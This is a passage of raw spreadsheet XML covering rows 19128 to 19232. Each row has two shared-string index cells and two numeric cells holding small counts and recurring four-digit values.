        <v>5600</v>
      </c>
    </row>
    <row r="19128" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19128" t="s">
        <v>16229</v>
      </c>
      <c r="B19128" t="s">
        <v>16219</v>
      </c>
      <c r="C19128">
        <v>0</v>
      </c>
      <c r="D19128">
        <v>5600</v>
      </c>
    </row>
    <row r="19129" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19129" t="s">
        <v>16230</v>
      </c>
      <c r="B19129" t="s">
        <v>16220</v>
      </c>
      <c r="C19129">
        <v>0</v>
      </c>
      <c r="D19129">
        <v>5600</v>
      </c>
    </row>
    <row r="19130" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19130" t="s">
        <v>16229</v>
      </c>
      <c r="B19130" t="s">
        <v>16221</v>
      </c>
      <c r="C19130">
        <v>0</v>
      </c>
      <c r="D19130">
        <v>5600</v>
      </c>
    </row>
    <row r="19131" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19131" t="s">
        <v>16230</v>
      </c>
      <c r="B19131" t="s">
        <v>16222</v>
      </c>
      <c r="C19131">
        <v>0</v>
      </c>
      <c r="D19131">
        <v>5600</v>
      </c>
    </row>
    <row r="19132" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19132" t="s">
        <v>16223</v>
      </c>
      <c r="B19132" t="s">
        <v>16223</v>
      </c>
      <c r="C19132">
        <v>0</v>
      </c>
      <c r="D19132">
        <v>5600</v>
      </c>
    </row>
    <row r="19133" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19133" t="s">
        <v>16224</v>
      </c>
      <c r="B19133" t="s">
        <v>16224</v>
      </c>
      <c r="C19133">
        <v>0</v>
      </c>
      <c r="D19133">
        <v>5600</v>
      </c>
    </row>
    <row r="19134" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19134" t="s">
        <v>16228</v>
      </c>
      <c r="B19134" t="s">
        <v>16211</v>
      </c>
      <c r="C19134">
        <v>0</v>
      </c>
      <c r="D19134">
        <v>1689</v>
      </c>
    </row>
    <row r="19135" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19135" t="s">
        <v>16231</v>
      </c>
      <c r="B19135" t="s">
        <v>16212</v>
      </c>
      <c r="C19135">
        <v>0</v>
      </c>
      <c r="D19135">
        <v>1689</v>
      </c>
    </row>
    <row r="19136" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19136" t="s">
        <v>16228</v>
      </c>
      <c r="B19136" t="s">
        <v>16213</v>
      </c>
      <c r="C19136">
        <v>0</v>
      </c>
      <c r="D19136">
        <v>1689</v>
      </c>
    </row>
    <row r="19137" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19137" t="s">
        <v>16231</v>
      </c>
      <c r="B19137" t="s">
        <v>16214</v>
      </c>
      <c r="C19137">
        <v>0</v>
      </c>
      <c r="D19137">
        <v>1689</v>
      </c>
    </row>
    <row r="19138" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19138" t="s">
        <v>16228</v>
      </c>
      <c r="B19138" t="s">
        <v>16215</v>
      </c>
      <c r="C19138">
        <v>0</v>
      </c>
      <c r="D19138">
        <v>1689</v>
      </c>
    </row>
    <row r="19139" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19139" t="s">
        <v>16231</v>
      </c>
      <c r="B19139" t="s">
        <v>16216</v>
      </c>
      <c r="C19139">
        <v>2</v>
      </c>
      <c r="D19139">
        <v>1689</v>
      </c>
    </row>
    <row r="19140" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19140" t="s">
        <v>16228</v>
      </c>
      <c r="B19140" t="s">
        <v>16217</v>
      </c>
      <c r="C19140">
        <v>7</v>
      </c>
      <c r="D19140">
        <v>1689</v>
      </c>
    </row>
    <row r="19141" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19141" t="s">
        <v>16231</v>
      </c>
      <c r="B19141" t="s">
        <v>16218</v>
      </c>
      <c r="C19141">
        <v>0</v>
      </c>
      <c r="D19141">
        <v>1689</v>
      </c>
    </row>
    <row r="19142" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19142" t="s">
        <v>16229</v>
      </c>
      <c r="B19142" t="s">
        <v>16219</v>
      </c>
      <c r="C19142">
        <v>0</v>
      </c>
      <c r="D19142">
        <v>1689</v>
      </c>
    </row>
    <row r="19143" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19143" t="s">
        <v>16230</v>
      </c>
      <c r="B19143" t="s">
        <v>16220</v>
      </c>
      <c r="C19143">
        <v>0</v>
      </c>
      <c r="D19143">
        <v>1689</v>
      </c>
    </row>
    <row r="19144" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19144" t="s">
        <v>16229</v>
      </c>
      <c r="B19144" t="s">
        <v>16221</v>
      </c>
      <c r="C19144">
        <v>0</v>
      </c>
      <c r="D19144">
        <v>1689</v>
      </c>
    </row>
    <row r="19145" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19145" t="s">
        <v>16230</v>
      </c>
      <c r="B19145" t="s">
        <v>16222</v>
      </c>
      <c r="C19145">
        <v>0</v>
      </c>
      <c r="D19145">
        <v>1689</v>
      </c>
    </row>
    <row r="19146" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19146" t="s">
        <v>16223</v>
      </c>
      <c r="B19146" t="s">
        <v>16223</v>
      </c>
      <c r="C19146">
        <v>0</v>
      </c>
      <c r="D19146">
        <v>1689</v>
      </c>
    </row>
    <row r="19147" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19147" t="s">
        <v>16224</v>
      </c>
      <c r="B19147" t="s">
        <v>16224</v>
      </c>
      <c r="C19147">
        <v>0</v>
      </c>
      <c r="D19147">
        <v>1689</v>
      </c>
    </row>
    <row r="19148" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19148" t="s">
        <v>16228</v>
      </c>
      <c r="B19148" t="s">
        <v>16211</v>
      </c>
      <c r="C19148">
        <v>1</v>
      </c>
      <c r="D19148">
        <v>5611</v>
      </c>
    </row>
    <row r="19149" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19149" t="s">
        <v>16231</v>
      </c>
      <c r="B19149" t="s">
        <v>16212</v>
      </c>
      <c r="C19149">
        <v>3</v>
      </c>
      <c r="D19149">
        <v>5611</v>
      </c>
    </row>
    <row r="19150" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19150" t="s">
        <v>16228</v>
      </c>
      <c r="B19150" t="s">
        <v>16213</v>
      </c>
      <c r="C19150">
        <v>0</v>
      </c>
      <c r="D19150">
        <v>5611</v>
      </c>
    </row>
    <row r="19151" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19151" t="s">
        <v>16231</v>
      </c>
      <c r="B19151" t="s">
        <v>16214</v>
      </c>
      <c r="C19151">
        <v>2</v>
      </c>
      <c r="D19151">
        <v>5611</v>
      </c>
    </row>
    <row r="19152" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19152" t="s">
        <v>16228</v>
      </c>
      <c r="B19152" t="s">
        <v>16215</v>
      </c>
      <c r="C19152">
        <v>1</v>
      </c>
      <c r="D19152">
        <v>5611</v>
      </c>
    </row>
    <row r="19153" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19153" t="s">
        <v>16231</v>
      </c>
      <c r="B19153" t="s">
        <v>16216</v>
      </c>
      <c r="C19153">
        <v>3</v>
      </c>
      <c r="D19153">
        <v>5611</v>
      </c>
    </row>
    <row r="19154" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19154" t="s">
        <v>16228</v>
      </c>
      <c r="B19154" t="s">
        <v>16217</v>
      </c>
      <c r="C19154">
        <v>0</v>
      </c>
      <c r="D19154">
        <v>5611</v>
      </c>
    </row>
    <row r="19155" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19155" t="s">
        <v>16231</v>
      </c>
      <c r="B19155" t="s">
        <v>16218</v>
      </c>
      <c r="C19155">
        <v>2</v>
      </c>
      <c r="D19155">
        <v>5611</v>
      </c>
    </row>
    <row r="19156" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19156" t="s">
        <v>16229</v>
      </c>
      <c r="B19156" t="s">
        <v>16219</v>
      </c>
      <c r="C19156">
        <v>0</v>
      </c>
      <c r="D19156">
        <v>5611</v>
      </c>
    </row>
    <row r="19157" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19157" t="s">
        <v>16230</v>
      </c>
      <c r="B19157" t="s">
        <v>16220</v>
      </c>
      <c r="C19157">
        <v>0</v>
      </c>
      <c r="D19157">
        <v>5611</v>
      </c>
    </row>
    <row r="19158" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19158" t="s">
        <v>16229</v>
      </c>
      <c r="B19158" t="s">
        <v>16221</v>
      </c>
      <c r="C19158">
        <v>0</v>
      </c>
      <c r="D19158">
        <v>5611</v>
      </c>
    </row>
    <row r="19159" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19159" t="s">
        <v>16230</v>
      </c>
      <c r="B19159" t="s">
        <v>16222</v>
      </c>
      <c r="C19159">
        <v>0</v>
      </c>
      <c r="D19159">
        <v>5611</v>
      </c>
    </row>
    <row r="19160" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19160" t="s">
        <v>16223</v>
      </c>
      <c r="B19160" t="s">
        <v>16223</v>
      </c>
      <c r="C19160">
        <v>7</v>
      </c>
      <c r="D19160">
        <v>5611</v>
      </c>
    </row>
    <row r="19161" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19161" t="s">
        <v>16224</v>
      </c>
      <c r="B19161" t="s">
        <v>16224</v>
      </c>
      <c r="C19161">
        <v>1</v>
      </c>
      <c r="D19161">
        <v>5611</v>
      </c>
    </row>
    <row r="19162" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19162" t="s">
        <v>16228</v>
      </c>
      <c r="B19162" t="s">
        <v>16211</v>
      </c>
      <c r="C19162">
        <v>0</v>
      </c>
      <c r="D19162">
        <v>5582</v>
      </c>
    </row>
    <row r="19163" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19163" t="s">
        <v>16231</v>
      </c>
      <c r="B19163" t="s">
        <v>16212</v>
      </c>
      <c r="C19163">
        <v>0</v>
      </c>
      <c r="D19163">
        <v>5582</v>
      </c>
    </row>
    <row r="19164" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19164" t="s">
        <v>16228</v>
      </c>
      <c r="B19164" t="s">
        <v>16213</v>
      </c>
      <c r="C19164">
        <v>0</v>
      </c>
      <c r="D19164">
        <v>5582</v>
      </c>
    </row>
    <row r="19165" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19165" t="s">
        <v>16231</v>
      </c>
      <c r="B19165" t="s">
        <v>16214</v>
      </c>
      <c r="C19165">
        <v>0</v>
      </c>
      <c r="D19165">
        <v>5582</v>
      </c>
    </row>
    <row r="19166" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19166" t="s">
        <v>16228</v>
      </c>
      <c r="B19166" t="s">
        <v>16215</v>
      </c>
      <c r="C19166">
        <v>2</v>
      </c>
      <c r="D19166">
        <v>5582</v>
      </c>
    </row>
    <row r="19167" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19167" t="s">
        <v>16231</v>
      </c>
      <c r="B19167" t="s">
        <v>16216</v>
      </c>
      <c r="C19167">
        <v>2</v>
      </c>
      <c r="D19167">
        <v>5582</v>
      </c>
    </row>
    <row r="19168" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19168" t="s">
        <v>16228</v>
      </c>
      <c r="B19168" t="s">
        <v>16217</v>
      </c>
      <c r="C19168">
        <v>5</v>
      </c>
      <c r="D19168">
        <v>5582</v>
      </c>
    </row>
    <row r="19169" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19169" t="s">
        <v>16231</v>
      </c>
      <c r="B19169" t="s">
        <v>16218</v>
      </c>
      <c r="C19169">
        <v>0</v>
      </c>
      <c r="D19169">
        <v>5582</v>
      </c>
    </row>
    <row r="19170" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19170" t="s">
        <v>16229</v>
      </c>
      <c r="B19170" t="s">
        <v>16219</v>
      </c>
      <c r="C19170">
        <v>0</v>
      </c>
      <c r="D19170">
        <v>5582</v>
      </c>
    </row>
    <row r="19171" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19171" t="s">
        <v>16230</v>
      </c>
      <c r="B19171" t="s">
        <v>16220</v>
      </c>
      <c r="C19171">
        <v>0</v>
      </c>
      <c r="D19171">
        <v>5582</v>
      </c>
    </row>
    <row r="19172" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19172" t="s">
        <v>16229</v>
      </c>
      <c r="B19172" t="s">
        <v>16221</v>
      </c>
      <c r="C19172">
        <v>0</v>
      </c>
      <c r="D19172">
        <v>5582</v>
      </c>
    </row>
    <row r="19173" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19173" t="s">
        <v>16230</v>
      </c>
      <c r="B19173" t="s">
        <v>16222</v>
      </c>
      <c r="C19173">
        <v>0</v>
      </c>
      <c r="D19173">
        <v>5582</v>
      </c>
    </row>
    <row r="19174" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19174" t="s">
        <v>16223</v>
      </c>
      <c r="B19174" t="s">
        <v>16223</v>
      </c>
      <c r="C19174">
        <v>0</v>
      </c>
      <c r="D19174">
        <v>5582</v>
      </c>
    </row>
    <row r="19175" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19175" t="s">
        <v>16224</v>
      </c>
      <c r="B19175" t="s">
        <v>16224</v>
      </c>
      <c r="C19175">
        <v>0</v>
      </c>
      <c r="D19175">
        <v>5582</v>
      </c>
    </row>
    <row r="19176" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19176" t="s">
        <v>16228</v>
      </c>
      <c r="B19176" t="s">
        <v>16211</v>
      </c>
      <c r="C19176">
        <v>0</v>
      </c>
      <c r="D19176">
        <v>5300</v>
      </c>
    </row>
    <row r="19177" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19177" t="s">
        <v>16231</v>
      </c>
      <c r="B19177" t="s">
        <v>16212</v>
      </c>
      <c r="C19177">
        <v>0</v>
      </c>
      <c r="D19177">
        <v>5300</v>
      </c>
    </row>
    <row r="19178" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19178" t="s">
        <v>16228</v>
      </c>
      <c r="B19178" t="s">
        <v>16213</v>
      </c>
      <c r="C19178">
        <v>0</v>
      </c>
      <c r="D19178">
        <v>5300</v>
      </c>
    </row>
    <row r="19179" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19179" t="s">
        <v>16231</v>
      </c>
      <c r="B19179" t="s">
        <v>16214</v>
      </c>
      <c r="C19179">
        <v>0</v>
      </c>
      <c r="D19179">
        <v>5300</v>
      </c>
    </row>
    <row r="19180" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19180" t="s">
        <v>16228</v>
      </c>
      <c r="B19180" t="s">
        <v>16215</v>
      </c>
      <c r="C19180">
        <v>2</v>
      </c>
      <c r="D19180">
        <v>5300</v>
      </c>
    </row>
    <row r="19181" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19181" t="s">
        <v>16231</v>
      </c>
      <c r="B19181" t="s">
        <v>16216</v>
      </c>
      <c r="C19181">
        <v>1</v>
      </c>
      <c r="D19181">
        <v>5300</v>
      </c>
    </row>
    <row r="19182" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19182" t="s">
        <v>16228</v>
      </c>
      <c r="B19182" t="s">
        <v>16217</v>
      </c>
      <c r="C19182">
        <v>2</v>
      </c>
      <c r="D19182">
        <v>5300</v>
      </c>
    </row>
    <row r="19183" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19183" t="s">
        <v>16231</v>
      </c>
      <c r="B19183" t="s">
        <v>16218</v>
      </c>
      <c r="C19183">
        <v>1</v>
      </c>
      <c r="D19183">
        <v>5300</v>
      </c>
    </row>
    <row r="19184" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19184" t="s">
        <v>16229</v>
      </c>
      <c r="B19184" t="s">
        <v>16219</v>
      </c>
      <c r="C19184">
        <v>0</v>
      </c>
      <c r="D19184">
        <v>5300</v>
      </c>
    </row>
    <row r="19185" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19185" t="s">
        <v>16230</v>
      </c>
      <c r="B19185" t="s">
        <v>16220</v>
      </c>
      <c r="C19185">
        <v>0</v>
      </c>
      <c r="D19185">
        <v>5300</v>
      </c>
    </row>
    <row r="19186" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19186" t="s">
        <v>16229</v>
      </c>
      <c r="B19186" t="s">
        <v>16221</v>
      </c>
      <c r="C19186">
        <v>0</v>
      </c>
      <c r="D19186">
        <v>5300</v>
      </c>
    </row>
    <row r="19187" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19187" t="s">
        <v>16230</v>
      </c>
      <c r="B19187" t="s">
        <v>16222</v>
      </c>
      <c r="C19187">
        <v>0</v>
      </c>
      <c r="D19187">
        <v>5300</v>
      </c>
    </row>
    <row r="19188" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19188" t="s">
        <v>16223</v>
      </c>
      <c r="B19188" t="s">
        <v>16223</v>
      </c>
      <c r="C19188">
        <v>6</v>
      </c>
      <c r="D19188">
        <v>5300</v>
      </c>
    </row>
    <row r="19189" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19189" t="s">
        <v>16224</v>
      </c>
      <c r="B19189" t="s">
        <v>16224</v>
      </c>
      <c r="C19189">
        <v>0</v>
      </c>
      <c r="D19189">
        <v>5300</v>
      </c>
    </row>
    <row r="19190" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19190" t="s">
        <v>16228</v>
      </c>
      <c r="B19190" t="s">
        <v>16211</v>
      </c>
      <c r="C19190">
        <v>0</v>
      </c>
      <c r="D19190">
        <v>1581</v>
      </c>
    </row>
    <row r="19191" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19191" t="s">
        <v>16231</v>
      </c>
      <c r="B19191" t="s">
        <v>16212</v>
      </c>
      <c r="C19191">
        <v>0</v>
      </c>
      <c r="D19191">
        <v>1581</v>
      </c>
    </row>
    <row r="19192" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19192" t="s">
        <v>16228</v>
      </c>
      <c r="B19192" t="s">
        <v>16213</v>
      </c>
      <c r="C19192">
        <v>0</v>
      </c>
      <c r="D19192">
        <v>1581</v>
      </c>
    </row>
    <row r="19193" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19193" t="s">
        <v>16231</v>
      </c>
      <c r="B19193" t="s">
        <v>16214</v>
      </c>
      <c r="C19193">
        <v>0</v>
      </c>
      <c r="D19193">
        <v>1581</v>
      </c>
    </row>
    <row r="19194" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19194" t="s">
        <v>16228</v>
      </c>
      <c r="B19194" t="s">
        <v>16215</v>
      </c>
      <c r="C19194">
        <v>1</v>
      </c>
      <c r="D19194">
        <v>1581</v>
      </c>
    </row>
    <row r="19195" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19195" t="s">
        <v>16231</v>
      </c>
      <c r="B19195" t="s">
        <v>16216</v>
      </c>
      <c r="C19195">
        <v>0</v>
      </c>
      <c r="D19195">
        <v>1581</v>
      </c>
    </row>
    <row r="19196" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19196" t="s">
        <v>16228</v>
      </c>
      <c r="B19196" t="s">
        <v>16217</v>
      </c>
      <c r="C19196">
        <v>3</v>
      </c>
      <c r="D19196">
        <v>1581</v>
      </c>
    </row>
    <row r="19197" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19197" t="s">
        <v>16231</v>
      </c>
      <c r="B19197" t="s">
        <v>16218</v>
      </c>
      <c r="C19197">
        <v>1</v>
      </c>
      <c r="D19197">
        <v>1581</v>
      </c>
    </row>
    <row r="19198" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19198" t="s">
        <v>16229</v>
      </c>
      <c r="B19198" t="s">
        <v>16219</v>
      </c>
      <c r="C19198">
        <v>0</v>
      </c>
      <c r="D19198">
        <v>1581</v>
      </c>
    </row>
    <row r="19199" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19199" t="s">
        <v>16230</v>
      </c>
      <c r="B19199" t="s">
        <v>16220</v>
      </c>
      <c r="C19199">
        <v>0</v>
      </c>
      <c r="D19199">
        <v>1581</v>
      </c>
    </row>
    <row r="19200" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19200" t="s">
        <v>16229</v>
      </c>
      <c r="B19200" t="s">
        <v>16221</v>
      </c>
      <c r="C19200">
        <v>4</v>
      </c>
      <c r="D19200">
        <v>1581</v>
      </c>
    </row>
    <row r="19201" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19201" t="s">
        <v>16230</v>
      </c>
      <c r="B19201" t="s">
        <v>16222</v>
      </c>
      <c r="C19201">
        <v>0</v>
      </c>
      <c r="D19201">
        <v>1581</v>
      </c>
    </row>
    <row r="19202" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19202" t="s">
        <v>16223</v>
      </c>
      <c r="B19202" t="s">
        <v>16223</v>
      </c>
      <c r="C19202">
        <v>26</v>
      </c>
      <c r="D19202">
        <v>1581</v>
      </c>
    </row>
    <row r="19203" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19203" t="s">
        <v>16224</v>
      </c>
      <c r="B19203" t="s">
        <v>16224</v>
      </c>
      <c r="C19203">
        <v>1</v>
      </c>
      <c r="D19203">
        <v>1581</v>
      </c>
    </row>
    <row r="19204" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19204" t="s">
        <v>16228</v>
      </c>
      <c r="B19204" t="s">
        <v>16211</v>
      </c>
      <c r="C19204">
        <v>0</v>
      </c>
      <c r="D19204">
        <v>5604</v>
      </c>
    </row>
    <row r="19205" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19205" t="s">
        <v>16231</v>
      </c>
      <c r="B19205" t="s">
        <v>16212</v>
      </c>
      <c r="C19205">
        <v>0</v>
      </c>
      <c r="D19205">
        <v>5604</v>
      </c>
    </row>
    <row r="19206" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19206" t="s">
        <v>16228</v>
      </c>
      <c r="B19206" t="s">
        <v>16213</v>
      </c>
      <c r="C19206">
        <v>0</v>
      </c>
      <c r="D19206">
        <v>5604</v>
      </c>
    </row>
    <row r="19207" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19207" t="s">
        <v>16231</v>
      </c>
      <c r="B19207" t="s">
        <v>16214</v>
      </c>
      <c r="C19207">
        <v>0</v>
      </c>
      <c r="D19207">
        <v>5604</v>
      </c>
    </row>
    <row r="19208" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19208" t="s">
        <v>16228</v>
      </c>
      <c r="B19208" t="s">
        <v>16215</v>
      </c>
      <c r="C19208">
        <v>4</v>
      </c>
      <c r="D19208">
        <v>5604</v>
      </c>
    </row>
    <row r="19209" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19209" t="s">
        <v>16231</v>
      </c>
      <c r="B19209" t="s">
        <v>16216</v>
      </c>
      <c r="C19209">
        <v>10</v>
      </c>
      <c r="D19209">
        <v>5604</v>
      </c>
    </row>
    <row r="19210" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19210" t="s">
        <v>16228</v>
      </c>
      <c r="B19210" t="s">
        <v>16217</v>
      </c>
      <c r="C19210">
        <v>3</v>
      </c>
      <c r="D19210">
        <v>5604</v>
      </c>
    </row>
    <row r="19211" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19211" t="s">
        <v>16231</v>
      </c>
      <c r="B19211" t="s">
        <v>16218</v>
      </c>
      <c r="C19211">
        <v>0</v>
      </c>
      <c r="D19211">
        <v>5604</v>
      </c>
    </row>
    <row r="19212" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19212" t="s">
        <v>16229</v>
      </c>
      <c r="B19212" t="s">
        <v>16219</v>
      </c>
      <c r="C19212">
        <v>3</v>
      </c>
      <c r="D19212">
        <v>5604</v>
      </c>
    </row>
    <row r="19213" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19213" t="s">
        <v>16230</v>
      </c>
      <c r="B19213" t="s">
        <v>16220</v>
      </c>
      <c r="C19213">
        <v>11</v>
      </c>
      <c r="D19213">
        <v>5604</v>
      </c>
    </row>
    <row r="19214" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19214" t="s">
        <v>16229</v>
      </c>
      <c r="B19214" t="s">
        <v>16221</v>
      </c>
      <c r="C19214">
        <v>53</v>
      </c>
      <c r="D19214">
        <v>5604</v>
      </c>
    </row>
    <row r="19215" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19215" t="s">
        <v>16230</v>
      </c>
      <c r="B19215" t="s">
        <v>16222</v>
      </c>
      <c r="C19215">
        <v>56</v>
      </c>
      <c r="D19215">
        <v>5604</v>
      </c>
    </row>
    <row r="19216" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19216" t="s">
        <v>16223</v>
      </c>
      <c r="B19216" t="s">
        <v>16223</v>
      </c>
      <c r="C19216">
        <v>6</v>
      </c>
      <c r="D19216">
        <v>5604</v>
      </c>
    </row>
    <row r="19217" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19217" t="s">
        <v>16224</v>
      </c>
      <c r="B19217" t="s">
        <v>16224</v>
      </c>
      <c r="C19217">
        <v>1</v>
      </c>
      <c r="D19217">
        <v>5604</v>
      </c>
    </row>
    <row r="19218" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19218" t="s">
        <v>16228</v>
      </c>
      <c r="B19218" t="s">
        <v>16211</v>
      </c>
      <c r="C19218">
        <v>0</v>
      </c>
      <c r="D19218">
        <v>5473</v>
      </c>
    </row>
    <row r="19219" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19219" t="s">
        <v>16231</v>
      </c>
      <c r="B19219" t="s">
        <v>16212</v>
      </c>
      <c r="C19219">
        <v>0</v>
      </c>
      <c r="D19219">
        <v>5473</v>
      </c>
    </row>
    <row r="19220" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19220" t="s">
        <v>16228</v>
      </c>
      <c r="B19220" t="s">
        <v>16213</v>
      </c>
      <c r="C19220">
        <v>0</v>
      </c>
      <c r="D19220">
        <v>5473</v>
      </c>
    </row>
    <row r="19221" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19221" t="s">
        <v>16231</v>
      </c>
      <c r="B19221" t="s">
        <v>16214</v>
      </c>
      <c r="C19221">
        <v>0</v>
      </c>
      <c r="D19221">
        <v>5473</v>
      </c>
    </row>
    <row r="19222" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19222" t="s">
        <v>16228</v>
      </c>
      <c r="B19222" t="s">
        <v>16215</v>
      </c>
      <c r="C19222">
        <v>1</v>
      </c>
      <c r="D19222">
        <v>5473</v>
      </c>
    </row>
    <row r="19223" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19223" t="s">
        <v>16231</v>
      </c>
      <c r="B19223" t="s">
        <v>16216</v>
      </c>
      <c r="C19223">
        <v>0</v>
      </c>
      <c r="D19223">
        <v>5473</v>
      </c>
    </row>
    <row r="19224" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19224" t="s">
        <v>16228</v>
      </c>
      <c r="B19224" t="s">
        <v>16217</v>
      </c>
      <c r="C19224">
        <v>1</v>
      </c>
      <c r="D19224">
        <v>5473</v>
      </c>
    </row>
    <row r="19225" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19225" t="s">
        <v>16231</v>
      </c>
      <c r="B19225" t="s">
        <v>16218</v>
      </c>
      <c r="C19225">
        <v>0</v>
      </c>
      <c r="D19225">
        <v>5473</v>
      </c>
    </row>
    <row r="19226" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19226" t="s">
        <v>16229</v>
      </c>
      <c r="B19226" t="s">
        <v>16219</v>
      </c>
      <c r="C19226">
        <v>1</v>
      </c>
      <c r="D19226">
        <v>5473</v>
      </c>
    </row>
    <row r="19227" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19227" t="s">
        <v>16230</v>
      </c>
      <c r="B19227" t="s">
        <v>16220</v>
      </c>
      <c r="C19227">
        <v>4</v>
      </c>
      <c r="D19227">
        <v>5473</v>
      </c>
    </row>
    <row r="19228" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19228" t="s">
        <v>16229</v>
      </c>
      <c r="B19228" t="s">
        <v>16221</v>
      </c>
      <c r="C19228">
        <v>1</v>
      </c>
      <c r="D19228">
        <v>5473</v>
      </c>
    </row>
    <row r="19229" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19229" t="s">
        <v>16230</v>
      </c>
      <c r="B19229" t="s">
        <v>16222</v>
      </c>
      <c r="C19229">
        <v>4</v>
      </c>
      <c r="D19229">
        <v>5473</v>
      </c>
    </row>
    <row r="19230" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19230" t="s">
        <v>16223</v>
      </c>
      <c r="B19230" t="s">
        <v>16223</v>
      </c>
      <c r="C19230">
        <v>26</v>
      </c>
      <c r="D19230">
        <v>5473</v>
      </c>
    </row>
    <row r="19231" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19231" t="s">
        <v>16224</v>
      </c>
      <c r="B19231" t="s">
        <v>16224</v>
      </c>
      <c r="C19231">
        <v>0</v>
      </c>
      <c r="D19231">
        <v>5473</v>
      </c>
    </row>
    <row r="19232" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19232" t="s">
        <v>16228</v>
      </c>
      <c r="B19232" t="s">
        <v>16211</v>
      </c>
      <c r="C19232">
        <v>0</v>
